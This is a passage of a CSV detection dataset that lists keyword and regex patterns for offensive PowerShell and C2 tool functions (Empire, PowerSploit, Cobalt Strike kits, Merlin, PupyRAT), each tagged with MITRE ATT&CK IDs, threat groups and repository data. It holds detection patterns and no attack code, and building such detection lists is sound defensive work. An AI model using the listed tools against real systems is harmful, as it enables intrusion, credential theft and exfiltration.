Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49014" "*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49015" "*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49016" "*invoke-eventhunter*",".{0,1000}invoke\-eventhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49017" "*Invoke-EventLogBackdoor*",".{0,1000}Invoke\-EventLogBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49018" "*Invoke-EventViewer *.exe*",".{0,1000}Invoke\-EventViewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","49019" "*Invoke-EventViewer.ps1*",".{0,1000}Invoke\-EventViewer\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","49020" 
"*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49021" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-EventVwrBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49022" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - 
TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","49023" "*Invoke-EventVwrBypass.ps1*",".{0,1000}Invoke\-EventVwrBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49024" "*Invoke-ExcelMacroPivot*",".{0,1000}Invoke\-ExcelMacroPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49025" "*Invoke-ExcelMacroPivot.ps1*",".{0,1000}Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49026" "*Invoke-ExecuteMSBuild*",".{0,1000}Invoke\-ExecuteMSBuild.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ExecuteMSBuild.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49027" "*Invoke-ExecuteMSBuild.ps1*",".{0,1000}Invoke\-ExecuteMSBuild\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49028" "*Invoke-ExecutionCommand.json*",".{0,1000}Invoke\-ExecutionCommand\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","49029" "*Invoke-ExfilDataToGitHub*",".{0,1000}Invoke\-ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire 
commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49030" "*Invoke-ExploitableLeakedHandlesCheck*",".{0,1000}Invoke\-ExploitableLeakedHandlesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49031" "*Invoke-Expression $obfuscated*",".{0,1000}Invoke\-Expression\s\$obfuscated.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","49032" "*Invoke-Eyewitness*",".{0,1000}Invoke\-Eyewitness.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49034" "*Invoke-FakeLogonScreen*",".{0,1000}Invoke\-FakeLogonScreen.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49035" "*Invoke-Farmer*",".{0,1000}Invoke\-Farmer.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49036" "*Invoke-FileC2Output*",".{0,1000}Invoke\-FileC2Output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 
- TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49037" "*Invoke-FileFinder -ShareList *",".{0,1000}Invoke\-FileFinder\s\-ShareList\s.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49038" "*invokefilefinder*",".{0,1000}invokefilefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49039" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","49040" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49041" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting 
Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49042" "*Invoke-FileTransferWMImplant*",".{0,1000}Invoke\-FileTransferWMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49043" "*Invoke-FindDLLHijack*",".{0,1000}Invoke\-FindDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49044" "*Invoke-FindPathHijack*",".{0,1000}Invoke\-FindPathHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
